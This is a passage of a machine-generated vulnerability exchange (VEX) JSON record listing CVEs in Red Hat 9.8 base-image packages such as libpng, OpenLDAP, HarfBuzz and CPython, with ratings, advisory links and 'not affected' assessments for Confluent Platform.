          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-22020",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "description": "No description is available for this CVE.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22020"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:9686"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22020"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418711"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438542"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448747"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460038"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460039"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460040"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460041"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460042"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460043"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460044"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460045"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66293"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22007"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22016"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22018"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22020"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22021"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23865"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25646"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26740"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34268"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34282"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:9686"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22020"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22020"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2026.html#AppendixJAVA"
        }
      ],
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-15.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-22185",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125,
        191
      ],
      "description": "OpenLDAP Lightning Memory-Mapped Database (LMDB) versions up to and including 0.9.14, prior to commit 8e1fda8, contain a heap buffer underflow in the readline() function of mdb_load. When processing malformed input containing an embedded NUL byte, an unsigned offset calculation can underflow and cause an out-of-bounds read of one byte before the allocated heap buffer. This can cause mdb_load to crash, leading to a limited denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22185"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22185"
        },
        {
          "url": "https://bugs.openldap.org/show_bug.cgi?id=10421"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22185"
        },
        {
          "url": "https://seclists.org/fulldisclosure/2026/Jan/5"
        },
        {
          "url": "https://seclists.org/fulldisclosure/2026/Jan/8"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22185"
        },
        {
          "url": "https://www.openldap.org/"
        },
        {
          "url": "https://www.vulncheck.com/advisories/openldap-lmdb-mdb-load-heap-buffer-underflow-in-readline"
        }
      ],
      "published": "2026-01-07T21:16:01+00:00",
      "updated": "2026-06-17T10:19:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.6.8-4.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openldap@2.6.8-4.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-22693",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "HarfBuzz is a text shaping engine. Prior to version 12.3.0, a null pointer dereference vulnerability exists in the SubtableUnicodesCache::create function located in src/hb-ot-cmap-table.hh. The function fails to check if hb_malloc returns NULL before using placement new to construct an object at the returned pointer address. When hb_malloc fails to allocate memory (which can occur in low-memory conditions or when using custom allocators that simulate allocation failures), it returns NULL. The code then attempts to call the constructor on this null pointer using placement new syntax, resulting in undefined behavior and a Segmentation Fault. This issue has been patched in version 12.3.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22693"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/11/1"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/12/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22693"
        },
        {
          "url": "https://github.com/harfbuzz/harfbuzz/commit/1265ff8d990284f04d8768f35b0e20ae5f60daae"
        },
        {
          "url": "https://github.com/harfbuzz/harfbuzz/security/advisories/GHSA-xvjr-f2r9-c7ww"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22693"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22693"
        }
      ],
      "published": "2026-01-10T06:15:52+00:00",
      "updated": "2026-06-17T10:20:14+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.7.4-10.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/harfbuzz@2.7.4-10.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-2297",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        668
      ],
      "description": "The import hook in CPython that handles legacy *.pyc files (SourcelessFileLoader) is incorrectly handled in FileLoader (a base class) and so does not use io.open_code() to read the .pyc files. sys.audit handlers for this audit event therefore do not fire.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-2297"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/05/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-2297"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/482d6f8bdba9da3725d272e8bb4a2d25fb6a603e"
        },
        {
          "url": "https://github.com/python/cpython/commit/69ddd9bb2cc4bd69b1565647c18659c6a789ccd9"
        },
        {
          "url": "https://github.com/python/cpython/commit/876858c9f65d9ab656c7fa639f268ce7856d89dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/a51b1b512de1d56b3714b65628a2eae2b07e535e"
        },
        {
          "url": "https://github.com/python/cpython/commit/c70adad78caeeea33f92f560ecb93331ca11bf66"
        },
        {
          "url": "https://github.com/python/cpython/commit/e58e9802b9bec5cdbf48fc9bf1da5f4fda482e86"
        },
        {
          "url": "https://github.com/python/cpython/issues/145506"
        },
        {
          "url": "https://github.com/python/cpython/pull/145507"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-2297.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2297"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2297"
        }
      ],
      "published": "2026-03-04T23:16:10+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
